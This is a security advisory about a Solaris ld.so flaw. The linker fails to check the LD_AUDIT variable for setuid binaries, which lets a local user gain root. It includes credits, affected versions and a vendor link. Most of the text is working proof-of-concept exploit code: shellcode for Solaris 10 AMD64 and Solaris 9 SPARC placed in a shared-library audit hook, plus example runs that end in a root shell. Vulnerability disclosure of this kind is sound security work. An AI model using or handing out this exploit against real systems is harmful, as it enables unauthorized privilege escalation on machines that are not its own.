|
Brought to you by:
Suppliers of:
|
|
|
| |
| Solaris's runtime linker fails to check the value of an environment variable allowing a local attacker to gain root privileges. |
| |
Credit:
The information has been provided by Przemyslaw Frasunek.
|
| |
Vulnerable Systems:
SPARC and x86 Platform:
* Solaris 8 with patches 109147-31 through 109147-36
* Solaris 9 with patches 112963-16 through 112963-19
* Solaris 10
Immune Systems:
* Solaris 7 is not affected by this issue.
ld.so in Solaris 9 and 10 doesn't check the length of LD_AUDIT environment variable when running s[ug]id binaries, allowing an attacker to run arbitrary code with elevated privileges.
Proof of Concept Code:
Solaris 10 (AMD64):
//dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb"
"\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01"
"\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f"
"\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07"
"\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52"
"\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
Example Run:
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
Solaris 9 on SPARC:
//dupa.c
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
Example Run:
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
Vendor Status:
Sun has released an advisory that addresses the issue. For more details see: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1
|
|
|
|
|
